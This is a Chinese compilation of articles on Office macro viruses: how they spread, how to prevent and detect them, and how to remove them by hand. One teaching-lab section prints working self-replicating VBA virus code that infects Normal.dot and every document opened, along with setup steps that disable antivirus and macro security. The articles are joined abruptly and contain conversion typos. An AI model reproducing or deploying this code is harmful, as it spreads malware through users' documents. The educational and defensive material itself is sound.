特别是Internet网络的普及，Email 的大量应用更为Word宏病毒传播铺平道路。

根据国外较保守的统计，宏病毒的感染率高达40%以上，即在现实生活中每发现100个病毒，其中就有40多个宏病毒，而国际上普通病毒种类已达12000多种。

2．制作、变种方便以往病毒是以二进制的计算机机器码形式出现，而宏病毒则是以人们容易阅读的源代码宏语言WordBasic形式出现，所以编写和修改宏病毒比以往病毒更容易。

世界上的宏病毒原型己有几十种，其变种与日俱增，追究其原因还是Word的开放性所致。

现在的Word 病毒都是用WordBasic语言所写成，大部分Word病毒宏并没有使用Word提供的Execute-Only处理函数处理，它们仍处于可打开阅读修改状态。

所有用户在Word工具的宏菜单中很方便就可以看到这种宏病毒的全部面目。

当然会有“不法之徒”利用掌握的Basic语句简单知识把其中病毒激活条件和破坏条件加以改变，立即就生产出了一种新的宏病毒，甚至比原病毒的危害更加严重。

宏病毒的名词解释宏病毒，即宏命令病毒，是一种针对办公软件和应用程序的恶意软件。

它利用了宏语言的功能，通过嵌入恶意代码来感染和破坏文件。

宏病毒的破坏性广泛存在于Word、Excel等办公软件中，曾经对计算机安全构成严重威胁。

一、宏病毒的传播方式宏病毒多以邮件附件的形式传播。

黑客通过电子邮件发送带有嵌入宏病毒的文档，一旦用户点击或打开，宏病毒就开始在用户计算机上执行恶意操作。

宏病毒还可以通过文件共享、网络下载和可移动存储介质等方式传播。

二、宏病毒的感染和破坏宏病毒主要感染和破坏办公文档文件，如Word、Excel、PowerPoint等。

它利用文档应用程序内置的宏语言功能，如VBA（Visual Basic for Applications），使恶意代码得以在打开文档的同时运行。

宏病毒可以操纵整个文档，执行恶意操作，如删除、篡改内容、复制自身并传播到其他文档。

宏病毒的破坏性可分为明显和隐蔽两种形式。

明显的病毒会立即显示出破坏行为，如删除文件、关闭程序等。

而隐蔽的病毒则更加隐蔽，它会在后台默默地进行操作，窃取用户信息、传播到其他文档或网络上。

三、预防宏病毒的措施为了保护计算机和个人信息的安全，我们需要采取一系列预防措施来防止宏病毒的感染和破坏。

1. 注意邮件和文件来源：不打开来自陌生人或不可信来源的邮件和文件，尤其是带有宏功能的文档。

2. 更新安全软件：定期更新防病毒软件和操作系统，以获取最新的病毒定义和安全补丁。

3. 禁用宏：对于非必要的宏功能，建议禁用或设置为仅在受信任的文件中启用。

4. 建立安全意识：提高员工对宏病毒的认知，教育他们不轻易点击或打开可疑附件，注意安全使用办公软件。

5. 备份重要文件：定期备份关键文件，以防止突发病毒感染或数据丢失。

四、应对宏病毒的解决方法如果不幸遭受宏病毒感染，我们需要及时采取相应的解决方法来处理病毒。

1. 断开网络连接：迅速断开计算机与网络的连接，以防止病毒通过网络传播和进一步破坏。

教你管理Office Word“宏病毒” 电脑资料现在很多朋友在写作文档时喜欢到网上下载各种模板简化自己的工作，教你管理Office Word“宏病毒” 。

不过网络模板中有一些“害群之马”可不是为方便大家而产生的，它们携带着宏病毒。

宏病毒寄生在模板或者文档中，当大家运行文档或者模板后就会激活病毒从而危害电脑。

不过也不用过分担忧，我们用下面的方法就可以让宏病毒永远远离我们的电脑。

验证：通过保存类型，巧妙鉴别宏病毒如何检查Word是否感染了宏病毒？其实检查的方法很简单。

翻开需要检查的文档，单击“文件”菜单栏，选择“另存为”命令，如果对话框中的保存类型固定为“文档模板”，那么表示这个文件已经感染了宏病毒，需要用杀毒软件进行清理了。

小提示：当然，你直接用杀毒软件来扫描一下这个文档也未尝不可，毕竟现在不装杀毒软件的用户还是少数啊。

拒绝：设置文档为“只读”属性，让病毒吃闭门羹因为宏病毒在word中寄居的文件就是no rmal.dot，所以预防宏病毒的方法其实也很简单，只要把没有感染宏病毒的normal.dot文件的属性设置为只读，这样宏病毒就不能寄居到normal.dot中，就能起到预防宏病毒的效果了，电脑资料《教你管理office word“宏病毒”》( s:// )。

小提示：虽然把一些内容固定的文件设置为具有只读属性，是防止病毒侵入的方法之一，但这也不是万能的，如果病毒制造者注意到这一点，在侵入前先修改你的文件属性，去掉只读属性，那对他们来说也是小菜一碟。

查杀：查杀，统统赶走宏病毒宏病毒是通过Word中的宏语言（一种类似VB的语言）编写的，易于传播而且危害巨大，常常能将你花了很多时编写的文档瞬间“吃掉”，下面介绍使用手工的方法杀掉宏病毒。

单击“工具”菜单栏，选择“宏”，单击“宏”命令（或者使用组合键“Alt＋F8”）调出宏对话框，如果在弹出的对话框中有已经记录的宏的话，那就极有可能是宏病毒，删除所有的宏就可以了。

Office办公软件中的宏与宏病毒Office办公软件中的宏与宏病毒在实际的社会生活中，人们在运用电脑享受到快捷方便的同时，也担心电脑病毒的干扰。

如何预防、清除宏病毒?下面是YJBYS店铺为大家搜索整理的几种方法，欢迎参考阅读，希望对大家有所帮助!想了解更多相关信息请持续关注我们应届毕业生培训网!现在所有企业用的最多的办公软件就是Office，它包含的范围非常广泛，做表格可以用Excel，打材料报告或文章可以用Word，如果数据比较多那就用Access数据库，如果开会或演示的话就可以用到PowerPoint，这些软件大大方便了人们的生活和使用。

但是随着计算机的大量使用，很多病毒都会乘虚而入。

宏病毒就是其中一种。

一、宏病毒的定义宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

所谓“宏”可以理解为一些命令的集合，类似于DOS下的批处理文件，它能给文件的编辑带来许多方便。

宏病毒编制极其容易，微软的宏语言都是BASIC语言的子集。

宏病毒利用宏语言外部的例程的调用能力如使用Windows API函数，能进行任何操作。

一句话只要有应用程序支持解释，宏病毒无需改动即可在许多平台上运行。

二、宏病毒的分析Office文档中的宏是Office中最高级别的部分，平时大家很少用到，它能把繁重的工作简单化，其在电脑中默认的安全级别为中，宏病毒正是利用这一点通过网络、u盘等进行传播，中毒的电脑明显反应变慢，Office文档大小在不断变化，有的成倍增加，一个小小的电子表格就有2M之多，对于操作者使用十分困难。

三、宏病毒感染后的特征“宏病毒”能在文件间复制自身的恶意宏程序，一般可以损坏或更改数据。

一旦打开沾染病毒的文档，其中的宏就会被执行，宏病毒会被激活，转移到计算机上，并驻留在Normal模板上。

此后，所有自动保存的文档都会“感染”上这种宏病毒，感染后的Office文档，除大小变大外，每次打开都要求启用宏，不启用便不能打开Office文档，或者打开了，全是空白，如果使用杀毒软件，则会把文档删除，造成文件丢失，给用户带来许多麻烦。

三招防范宏病毒由于宏病毒经常在办公软件Office中出现，给广大用户造成不小的损失。

笔者发现，通过以下三招可以远离宏病毒（以Word为例）。

第一招：设置宏安全级别打开Word，选择“工具选项安全性宏安全性”命令，这样就打开了宏的安全级别属性设置选项，将安全级别由默认的“高”修改为“非常高”，最后单击“确定”即可。

这样可以防止除Word默认的宏以外的其他宏运行。

第二招：运行宏病毒自动提示打开Word，选择“工具选项安全性宏安全性”命令，单击“可靠发行商”标签，取消选择“信任所有安装的加载项和模板”复选框，然后单击“确定”即可。

这样当打开含有宏的Word文档时，就会提示宏已被禁止。

当然，也可能让正常的宏使用受到限制。

第三招：卸载VBA彻底预防宏病毒VBA全称是Visual Basic for Application，它是Microsoft Visual Basic的宏语言版本。

用于Windows应用程序的宏。

是Word中宏的支持工具包，一旦禁用此包，一些自定义模板和所有的宏将不可用。

具体方法：双击“控制面板”中的“添加/删除程序”图标，找到Microsoft Office的安装项，单击“更改”按钮，选择“添加或删除功能”选项后，单击“下一步”按钮，在弹出来的窗口选“选择应用程序的高级自定义”复选框，再单击“下一步”按钮，这样，就可以选择删除该工具包。

在打开的Office程序及附加内容和工具中单击“Office共享功能“前的加号，找到“Visual Basic for Application”，单击前面的驱动器图标，选择“不安装”按钮即可。

经过以上三招，宏病毒将会远离你的Office了，这里是以Word为例介绍的，其实对Excel 也同样适用，不妨一试。

、只要运行注册表就可以啦！具体做法：在“开始”里找到“运行”按纽，点击后在“打开”栏里输入“regedit”，就可以打开注册表了；找到HKEY_LOCAL_MACHINE打开,找SOFTWARE打开,找Microsoft打开,找office 打开,找11.0打开,找EXCEL打开,找security打开后看到它旁边的窗口有一项名称为LEVEL 的，双击它，在跳出的编辑DWORD值里面看到数值数据（V）：下面的空格啦，你就可以在里面修改数值啦。

宏病毒原理宏病毒是一种利用应用程序的自动化功能来传播的恶意软件。

它们通常隐藏在文档或电子表格中，并利用应用程序中的宏语言来执行恶意代码。

宏病毒的原理是利用用户对文档的信任，通过激活宏来感染系统并传播恶意代码。

宏病毒通常利用常见的办公软件，如Microsoft Office中的Word和Excel，以及其他支持宏语言的应用程序。

当用户打开一个感染了宏病毒的文档时，病毒会利用应用程序中的宏功能来执行恶意代码。

这些恶意代码可以是用于窃取个人信息、破坏系统或网络安全，甚至是加密文件勒索。

宏病毒的传播方式多种多样，最常见的是通过电子邮件附件或下载的文档。

一旦用户打开了感染了宏病毒的文档，病毒就会开始执行恶意代码并尝试传播到其他系统或网络。

由于宏病毒利用了应用程序自身的功能来传播，因此很难被传统的防病毒软件所检测和清除。

为了防范宏病毒的威胁，用户需要采取一些预防措施。

首先，用户应该谨慎打开来自未知发件人的电子邮件附件，尤其是包含文档或电子表格的附件。

其次，用户应该定期更新其操作系统和应用程序，以确保其具有最新的安全补丁和更新。

此外，用户还可以考虑使用安全软件来扫描和清除潜在的宏病毒感染。

在企业环境中，管理员还可以通过限制用户对宏的执行权限来减少宏病毒的传播风险。

此外，教育用户如何辨别和处理潜在的宏病毒感染也是非常重要的。

通过提高用户的安全意识和培训，可以减少宏病毒对企业网络和系统的威胁。

总的来说，宏病毒利用应用程序的自动化功能来传播恶意代码，对个人用户和企业网络都构成了严重的威胁。

为了减少宏病毒的传播风险，用户需要保持警惕，定期更新系统和应用程序，并使用安全软件来扫描和清除潜在的感染。

同时，在企业环境中，管理员还可以通过限制用户对宏的执行权限来减少宏病毒的传播风险。

通过综合的安全措施和用户培训，可以有效地减少宏病毒对系统和网络的威胁。

宏病毒
宏病毒是一种寄存在Office文档或模板的宏中的计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所以自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

Word里的宏
如果需要在Word中反复执行某项任务，可以使用宏自动执行该任务。

宏是一系列Word 命令和指令，这些命令和指令组合在一起，形成了一个单独的命令，以实现任务执行的自动化。

我们通常采用“录制”的方式制作“宏”（[工具]|[宏]|[录制新宏]）。

开始录制时，Word 会自动把我们的操作记录下来，直到停止录制。

运行宏时，可以按Alt+F8。

宏的典型应用
加速日常编辑和格式设置；组合多个命令，例如插入具有指定尺寸和边框、指定行数和列数的表格；使对话框中的选项更易于访问；自动执行一系列复杂的任务。

无法选择文档类型
如果你在保存文档的时候，无法选择文档类型，这可能是由于Concept Virus宏病毒造成的，这种病毒阻止你将文件保存为文档模板外的文档类型。

Word宏病毒Word宏病毒1.实验目的(后果自负)Word宏是指能组织到一起为独立命令使用的一系列Word指令，它能使日常工作变得容易。

本实验演示了宏的编写，通过两个简单的宏病毒例如，说明宏的原理及其平安漏洞和缺陷，理解宏病毒的作用机制，从而加强对宏病毒的认识，提高防范意识。

2.实验所需条件和环境硬件设备：局域网，终端PC机。

系统软件：Windows系列操作系统支撑软件：Word 2003软件设置：关闭杀毒软；翻开Word 2003，在工具→宏→平安性中，将平安级别设置为低，在可靠发行商选项卡中，选择信任任何所有安装的加载项和模板，选择信任visual basic工程的访问实验环境配置如下列图所示：受感染终端受感染Word文档被感染终端宏病毒传播示意图3.实验内容和分析为了保证该实验不至于造成较大的破坏性，进行实验感染后，被感染终端不要翻开过多的word文档，否那么去除比拟麻烦〔对每个翻开过的文档都要去除〕。

3.1. 例1 自我复制，感染word公用模板和当前文档代码如下：'Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.SaveNormalPrompt = FalseOurcode = ThisDocument.VBProject.VBComponents(1).Co deModule.Lines(1, 100)Set Host = NormalTemplate.VBProject.VBComponents(1). CodeModuleIf ThisDocument = NormalTemplate Then Set Host = ActiveDocument.VBProject.VBComponents(1). CodeModuleEnd IfWith HostIf .Lines(1.1) <> "'Micro-Virus" Then.DeleteLines 1, .CountOfLines.InsertLines 1, Ourcode.ReplaceLine 2, "Sub Document_Close()"If ThisDocument = nomaltemplate Then.ReplaceLine 2, "Sub Document_Open()"End IfEnd IfEnd WithMsgBox "MicroVirus by Content Security Lab" End Sub翻开一个word文档，然后按Alt+F11调用宏编写窗口〔工具→宏→Visual Basic→宏编辑器〕,在左侧的project—>Microsoft Word对象→ThisDocument中输入以上代码，保存，此时当前word文档就含有宏病毒，只要下次翻开这个word文档，就会执行以上代码，并将自身复制到Normal.dot〔word文档的公共模板〕和当前文档的ThisDocument中，同时改变函数名〔模板中为Document_Close，当前文档为Document_Open〕，此时所有的word文档翻开和关闭时，都将运行以上的病毒代码，可以参加适当的恶意代码，影响word的正常使用，本例中只是简单的跳出一个提示框。

遭遇Word宏病毒怎么办word好用，宏病毒可怕，笔者在多次遭遇word宏病毒之后，终于摸索出一个自力更生，手工解决word宏病毒的简单、应急方法，成功率100％(适用于Word97、Word2000)。

一、常见现象描述现象1：使用word过程中，在进行打开、保存或关闭文档操作时，提示诸如“对象不存在”．之类的错误信息(这是宏病毒没编好，造成的执行错误)，并出现一个调试窗口，可以看到一行行代码(这些代码就是宏病毒的“身体”——VBA语言编写)导致正常的文档编辑工作无法进行，文档无法保存。

…现象2：进行正常操作时，忽然出现各种莫名其妙的对话窗口，比如，突然蹦出个对话框，提示让你输入一句话，还常带有一些俏皮话。

现象3：没有进行任何关闭操作的前提下，正在编辑的文档自动关闭，或者word自动关闭。

现象4：正常使用word时，常常突然出现提示Word非法操作，文档来不及保存。

二、检查宏病毒当怀疑有宏病毒时，可以通过以下方法确认宏病毒的存在：方法1：选择[工具]／[宏]／[宏]，如果出现对话框，对话框中有诸如AutoOpen、Autoclose、DocumentOpen、Documentsave、DocumentClose之类的宏名，无法确认其来源，可以认为是宏病毒。

方法2：选择[工具]／[宏]／[宏]、[录制新宏]、[visual Basic编辑器]菜单项，如果没有任何反应，可以确认宏病毒存在；同样，选择[选项]菜单项，[选项]对话框并不出现，可以确认宏病毒。

方法3，：打开[工具]菜单，发现其中的[宏]和[选项]菜单项“消失”了，而且没有人为的自定义过菜单，这就应该是宏病毒为保护自己不被发现、不被预防而设置的障碍。

三、解决办法应该相信，一切word宏病毒都是纸老虎。

这是因为：1．宏病毒用解释性语言VBA编写，需要word对宏病毒解释，宏病毒才能运行；2．宏病毒的自我复制，需要利用Word的通用模板文件(NOM6JLL．DOT)作为中介；3．word本身有预防宏病毒的功能。